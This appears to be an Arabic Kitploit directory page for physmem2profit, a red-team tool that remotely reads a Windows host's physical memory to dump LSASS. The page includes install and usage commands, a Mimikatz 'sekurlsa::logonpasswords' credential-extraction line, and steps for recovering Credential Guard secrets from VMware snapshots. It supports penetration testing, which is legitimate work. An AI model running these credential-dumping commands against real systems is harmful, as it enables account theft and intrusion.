Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
physmem2profit — Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely | Kitploit
أدوات/GitHubGitHub/reverseclabs/physmem2profit
Memory ForensicsPassword AttacksData ExfiltrationPost-ExploitationDigital ForensicsPenetration TestingRed Teaming
GitHubreverseclabs/physmem2profit

physmem2profit

Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely

عرض المستودع
42274منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

Physmem2profit

يمكن استخدام Physmem2profit لإنشاء minidump لعملية LSASS على المضيف المستهدف عبر تحليل الذاكرة الفعلية عن بُعد. الهدف من هذا البحث هو اقتراح نهج بديل لسرقة بيانات الاعتماد وإنشاء إطار عمل نمطي يمكن توسيعه لدعم برامج تشغيل أخرى يمكنها الوصول إلى الذاكرة الفعلية. يُنشئ Physmem2profit ملف minidump (.dmp) لعملية LSASS يمكن تحليله لاحقًا باستخدام Mimikatz. لا تتطلب الأداة Cobalt Strike ولكن يجب أن تعمل بشكل جيد عبر beacon مع وكيل SOCKS.

الفكرة موضحة أدناه:

Overview of Physmem2profit

تتكون الأداة من مكوّنين:

  1. مكوّن الخادم المكتوب بلغة C#، physmem2profit.exe، ويُنفَّذ على المضيف المستهدف
    • يحمّل برنامج تشغيل Winpmem ويعمل كخادم، مما يعرض الذاكرة الفعلية (RAM) للمضيف المستهدف عبر منفذ TCP
  2. مكوّن العميل، وحدة Python physmem2profit، ويُنفَّذ على الجهاز المهاجِم
    • عند تنفيذه مع --mode mount، يتصل بالجهاز المستهدف ويقوم بتركيب الذاكرة الفعلية للمضيف المستهدف كملف خام بمساعدة FUSE
    • عند تنفيذه مع --mode dump، يستدعي العديد من إضافات Rekall لتحليل صورة الذاكرة وإنشاء minidump لعملية LSASS.
    • عند تنفيذه مع --mode all، ينفّذ كل الإجراءات المذكورة أعلاه. سيتم إغلاق الاتصال بالخادم عند اكتمال التفريغ.

تعليمات التثبيت

  1. استنسخ مستودع Git الخاص بـ Physmem2profit: git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
  2. بالنسبة للخادم الذي يعمل على الكمبيوتر المستهدف:
    1. قم ببناء physmem2profit/server/Physmem2profit.sln باستخدام Visual Studio
  3. بالنسبة للعميل الذي يعمل على الجهاز المهاجِم:
    1. bash physmem2profit/client/install.sh

الاستخدام

  1. شغّل physmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] على الجهاز المستهدف بصلاحيات المسؤول.
    • يمكنك تنزيل برنامج تشغيل Winpmem المُوقَّع من هنا. يجب أن يكون هذا البرنامج موجودًا على المضيف المستهدف.
  2. شغّل source physmem2profit/client/.env/bin/activate على الجهاز المهاجِم. سيعمل هذا الأمر على تفعيل البيئة الافتراضية (virtualenv) التي أنشأها install.sh.
  3. شغّل cd physmem2profit/client ثم python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] على الجهاز المهاجِم
    • يجب أن يكون physmem2profit.exe قيد التشغيل على الجهاز المستهدف قبل تنفيذ هذا الأمر.
    • سيؤدي هذا إلى كتابة minidump الخاص بـ LSASS إلى output/[label]-[date]-lsass.dmp على الجهاز المهاجِم.
  4. انسخ ملف minidump إلى نظام Windows وشغّل mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"

Credential Guard

يتطلب فك تشفير بيانات الاعتماد المحمية بواسطة Credential Guard الوصول إلى مفتاح التشفير المخزّن في العالم الآمن (Secure World). لأغراض الاختبار، يدعم Physmem2profit استرجاع البيانات من العالم الآمن من لقطات VMware Fusion/Workstation (ملفات .vmem). يتيح ذلك فك تشفير بيانات الاعتماد المحمية بواسطة Credential Guard بمساعدة Mimikatz.

إعداد جهاز افتراضي للاختبار

  1. أنشئ جهازًا افتراضيًا يعمل بنظام Windows 10 باستخدام VMware Fusion/Workstation. انضم بالجهاز الافتراضي إلى نطاق (Credential Guard لا يحمي الحسابات المحلية)
  2. في الإعدادات المتقدمة، فعّل VBS (الأمان المستند إلى المحاكاة الافتراضية)
  3. انشر Credential Guard. من الخيارات السهلة استخدام أداة الاستعداد للعتاد لـ Device Guard و Credential Guard
  4. أعد التشغيل
  5. شغّل msinfo32 للتأكد من أن Virtualization-based security Services Running يعرض Credential Guard

الاختبار

  1. سجّل الدخول إلى الجهاز الافتراضي (باستخدام حساب نطاق)
  2. التقط لقطة
  3. شغّل Physmem2profit على ملف .vmem: python3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
    • سيؤدي هذا إلى كتابة minidump الخاص بـ LSASS إلى output/[label]-[date]-lsass.dmp. يحتوي ملف minidump على تدفق خاص يحمل البيانات من العالم الآمن، مما يسمح لـ Mimikatz بتحديد موقع مفتاح التشفير.
    • يتم أيضًا تخزين بيانات العالم الآمن في output/[label]-[date]-secure-world.raw.
    • إذا واجه Rekall مشاكل في تحليل ملف .vmem، فسيوصيك Physmem2profit بنسخ ملف .vmsn وإعادة تسميته إلى .vmss
  4. انسخ ملف minidump إلى نظام Windows وشغّل mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"

العمل المستقبلي

الدعم لتجاوز Credential Guard من خلال استغلال ثغرة البرنامج الثابت S3 Resume، والذي تم عرضه في حديثنا في Disobey، قادم قريبًا :).

مزيد من المعلومات

إعادة التفكير في سرقة بيانات الاعتماد | منشور مدونة يشرح لماذا تم اختيار هذا النهج لسرقة بيانات الاعتماد.

تم تطوير Physmem2profit بواسطة @b3arr0 و @TimoHirvonen.

شكر خاص للمساهمين:

  • Janusz Szmigielski لإعادة هيكلة الكود للإصدار الأول
  • Pawel Kurowski لإعادة هيكلة الكود للإصدار الأول
  • Grzegorz Rychlik لإعادة هيكلة الكود للإصدار الأول
تنزيل الأداة